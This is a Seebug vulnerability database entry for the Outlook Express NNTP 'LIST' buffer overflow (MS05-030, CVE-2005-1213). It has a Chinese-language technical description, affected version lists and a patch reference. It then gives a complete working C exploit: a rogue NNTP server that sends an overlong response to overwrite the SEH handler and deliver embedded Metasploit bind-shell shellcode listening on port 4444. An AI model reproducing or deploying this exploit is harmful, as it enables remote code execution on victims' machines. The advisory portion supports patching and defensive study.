MS Outlook Express NNTP Buffer Overflow Exploit (MS05-030)

2005-06-24T00:00:00
ID SSV:13664
Type seebug
Reporter Root
Modified 2005-06-24T00:00:00

Description

<p><strong>漏洞描述:</strong></p><p>Microsoft Outlook Express是Microsoft Windows操作系统捆绑的邮件和新闻组客户端。</p><p>Microsoft Outlook Express的新闻阅读功能中存在远程缓冲区溢出漏洞,可能允许攻击者以当前用户的权限执行任意代码。 具体的说,在发布LIST命令后解析NNTP服务器响应时会触发这个漏洞。位于C:\Program Files\Outlook Express\MSOE.DLL的MSOE.dll中的一个例程中存在栈溢出。以下地址和偏移基于Microsoft Windows 2000 SP4捆绑的MSOE.DLL 5.50.4927.1200版本。在解析以下形式的服务器响应时:alt.12hr 0<LONG STRING>000001325 0000001322 y FIELD1 FIELD2 FIELD3 FIELD4 TERMINATOR用到了各种字符串解析循环调用CharNext()和IsSpace()例程来判断空白字符所确定字段的长度,由StrCpy()将FIELD2拷贝到静态的16字节栈缓冲区:</p><p>SUB_6AED247A() ... </p><p>6AED268B mov eax, ebx ; eax = start of FIELD2 </p><p>6AED268D lea edi, [ebp+buff] ; edi = stack variable </p><p>6AED2690 sub eax, esi ; esi = end of FIELD2 </p><p>6AED2692 mov ecx, eax ; ecx = length of FIELD2 </p><p>6AED2694 mov edx, ecx ; edx = length of FIELD2 </p><p>6AED2696 shr ecx, 2 </p><p>6AED2699 rep movsd ; *** overflow occurs here </p><p>6AED269B mov ecx, edx </p><p>6AED269D and ecx, 3 </p><p>6AED26A0 rep movsb ; copy remaining bytes </p><p>6AED26A2 and byte ptr [ebp+eax+buff], 0 ; null terminate the string</p><p>然后将拷贝的缓冲区传送给例程StrToIntA()。位于0x6AED2699的rep movsd指令可以导致栈溢出。攻击者可以覆盖栈存储的SEH来改变执行流,最终导致执行任意代码。</p><p><strong>漏洞影响:</strong></p><p>受影响的软件:</p><p> •Microsoft Windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4</p><p>•Microsoft Windows XP Service Pack 1</p><p>•Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium):</p><p>•Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)</p><p>•Microsoft Windows Server 2003(用于基于 Itanium 的系统)</p><p>•Microsoft Windows Server 2003•Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、Microsoft Windows Millennium Edition (ME) </p><p>受影响的组件:</p><p> •在 Microsoft Windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4 上的 Outlook Express 5.5 Service Pack 2</p><p>•在 Microsoft Windows 2000 Service Pack 3、Microsoft Windows 2000 Service Pack 4 或 Microsoft Windows XP Service Pack 1 上的 Outlook Express 6 Service Pack 1</p><p>•用于 Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) 的 Outlook Express 6 Service Pack 1</p><p>•用于 Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) 的 Outlook Express 6 </p><p>•用于 Microsoft Windows Server 2003(用于基于 Itanium 的系统)的 Outlook Express 6 </p><p>•用于 Microsoft Windows Server 2003 的 Outlook Express 6 </p><p>不受影响的软件:</p><p> •Microsoft Windows Server 2003 Service Pack 1</p><p>•Microsoft Windows Server 2003 with SP1(用于基于 Itanium 的系统)</p><p>•Microsoft Windows Server 2003 x64 Edition</p><p>•Microsoft Windows XP Professional x64 Edition</p><p>•Microsoft Windows XP Service Pack 2</p><p> </p><p><strong>CVE-ID:</strong>CVE-2005-1213 </p><p> </p><p><strong>CNNVD-ID:</strong>CNNVD-200506-126</p><p> </p><p><strong>CNVD-ID:</strong>CNVD-2005-2133 </p><p> </p><p><strong>解决方案:</strong></p><p>Microsoft</p><p> ---------</p><p> Microsoft已经为此发布了一个安全公告(MS05-030)以及相应补丁:MS05-030:Cumulative Security Update in Outlook Express (897715)链接:<a href="http://www.microsoft.com/technet/security/Bulletin/MS05-030.mspx" rel="nofollow">http://www.microsoft.com/technet/security/Bulletin/MS05-030.mspx</a></p>

                                        
                                            
                                                #include &lt;winsock2.h&gt;
#include &lt;windows.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#pragma comment(lib,&quot;ws2_32&quot;)

/* win32_bind - EXITFUNC=process LPORT=4444 Size=344 
Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
&quot;\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x96&quot;
&quot;\x27\xc8\x3e\x83\xeb\xfc\xe2\xf4\x6a\x4d\x23\x73\x7e\xde\x37\xc1&quot;
&quot;\x69\x47\x43\x52\xb2\x03\x43\x7b\xaa\xac\xb4\x3b\xee\x26\x27\xb5&quot;
&quot;\xd9\x3f\x43\x61\xb6\x26\x23\x77\x1d\x13\x43\x3f\x78\x16\x08\xa7&quot;
&quot;\x3a\xa3\x08\x4a\x91\xe6\x02\x33\x97\xe5\x23\xca\xad\x73\xec\x16&quot;
&quot;\xe3\xc2\x43\x61\xb2\x26\x23\x58\x1d\x2b\x83\xb5\xc9\x3b\xc9\xd5&quot;
&quot;\x95\x0b\x43\xb7\xfa\x03\xd4\x5f\x55\x16\x13\x5a\x1d\x64\xf8\xb5&quot;
&quot;\xd6\x2b\x43\x4e\x8a\x8a\x43\x7e\x9e\x79\xa0\xb0\xd8\x29\x24\x6e&quot;
&quot;\x69\xf1\xae\x6d\xf0\x4f\xfb\x0c\xfe\x50\xbb\x0c\xc9\x73\x37\xee&quot;
&quot;\xfe\xec\x25\xc2\xad\x77\x37\xe8\xc9\xae\x2d\x58\x17\xca\xc0\x3c&quot;
&quot;\xc3\x4d\xca\xc1\x46\x4f\x11\x37\x63\x8a\x9f\xc1\x40\x74\x9b\x6d&quot;
&quot;\xc5\x74\x8b\x6d\xd5\x74\x37\xee\xf0\x4f\xd9\x62\xf0\x74\x41\xdf&quot;
&quot;\x03\x4f\x6c\x24\xe6\xe0\x9f\xc1\x40\x4d\xd8\x6f\xc3\xd8\x18\x56&quot;
&quot;\x32\x8a\xe6\xd7\xc1\xd8\x1e\x6d\xc3\xd8\x18\x56\x73\x6e\x4e\x77&quot;
&quot;\xc1\xd8\x1e\x6e\xc2\x73\x9d\xc1\x46\xb4\xa0\xd9\xef\xe1\xb1\x69&quot;
&quot;\x69\xf1\x9d\xc1\x46\x41\xa2\x5a\xf0\x4f\xab\x53\x1f\xc2\xa2\x6e&quot;
&quot;\xcf\x0e\x04\xb7\x71\x4d\x8c\xb7\x74\x16\x08\xcd\x3c\xd9\x8a\x13&quot;
&quot;\x68\x65\xe4\xad\x1b\x5d\xf0\x95\x3d\x8c\xa0\x4c\x68\x94\xde\xc1&quot;
&quot;\xe3\x63\x37\xe8\xcd\x70\x9a\x6f\xc7\x76\xa2\x3f\xc7\x76\x9d\x6f&quot;
&quot;\x69\xf7\xa0\x93\x4f\x22\x06\x6d\x69\xf1\xa2\xc1\x69\x10\x37\xee&quot;
&quot;\x1d\x70\x34\xbd\x52\x43\x37\xe8\xc4\xd8\x18\x56\xe8\xff\x2a\x4d&quot;
&quot;\xc5\xd8\x1e\xc1\x46\x27\xc8\x3e&quot;;

struct
{
DWORD dwJMPEBX;
char *szDescription;
}targets[] = 
{
{0x7803382b, &quot;win2k sp4 all language&quot;}
},v;

void usage(char *p)
{
int i;
printf( &quot;Usage: %s &lt;type&gt;\n&quot;
&quot;[type]\n&quot;, p);
for(i=0;i&lt;sizeof(targets)/sizeof(v);i++)
{
printf(&quot;%d\t%s\n&quot;, i, targets[i].szDescription);
}
}

void main(int argc, char **argv)
{
struct sockaddr_in server,client;
WSADATA wsd;
SOCKET s2,s3;
int ret;
char szRecvBuff[0x100];
char szSend[] = &quot;200\r\n&quot;;
int i,iType;
char szEvil[0x3000], szTmp[0x10];

printf( &quot;MS OE NNTP \&quot;LIST\&quot; Buffer Overflow (MS05-030) EXP\n&quot;
&quot;Credits: Bug found by iDEFENSE\n&quot;
&quot;coded by eyas &lt; eyas at xfocus.org&gt;\n&quot;
&quot;http://www.xfocus.net\n\n&quot;);

if(argc!=2)
{
usage(argv[0]);
return;
}

iType = atoi(argv[1]);


if (WSAStartup(MAKEWORD(1,1), &amp;wsd) != 0)
{
printf(&quot;[-] WSAStartup error:%d\n&quot;, WSAGetLastError());
return;
}
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(119);
server.sin_addr.s_addr= 0;
ret = bind(s2, (struct sockaddr *)&amp;server, sizeof(server));
ret = listen(s2, 100);
printf(&quot;[+] Listen on TCP 119.\n&quot;);
while(1)
{
ret=sizeof(client);
s3 = accept(s2, (struct sockaddr *)&amp;client, &amp;ret);
printf(&quot;[+] Connection accepted from %s:%d\n&quot;, 
inet_ntoa(client.sin_addr), ntohs(client.sin_port));

printf(&quot;[+] Send welcome information.\n&quot;);
send(s3, szSend, strlen(szSend), 0);

ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);
szRecvBuff[ret-1] = '\x0';
printf(&quot;[+] Recv: [%s]\n&quot;, szRecvBuff);
send(s3, szSend, strlen(szSend), 0);
printf(&quot;[+] Send response.\n&quot;);

ret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);
szRecvBuff[ret-4] = '\x0';
printf(&quot;[+] Recv: [%s]\n&quot;, szRecvBuff);
printf(&quot;[+] send evil buff.\n&quot;);

strcpy(szTmp, &quot;\xEB\x06\xEB\x06&quot;);
memcpy(&amp;szTmp[4], &amp;(targets[iType].dwJMPEBX),4);
szTmp[8]='\x0';
strcpy(szEvil, &quot;215 list\r\ngroup aaaa&quot;);
//for(i=0;i&lt;0x2598;i++)
//for(i=0;i&lt;0x30;i++)
for(i=0;i&lt;0x2598+0x200;i+=8)
strcat(szEvil, szTmp);
strcat(szEvil, (char *)scode);
strcat(szEvil, &quot; 1 y\r\n.\r\n&quot;);
send(s3, szEvil, strlen(szEvil), 0);
Sleep(1000);
closesocket(s3);
printf(&quot;[+] close connection\n&quot;);
}

WSACleanup();
return;
}

// sebug.net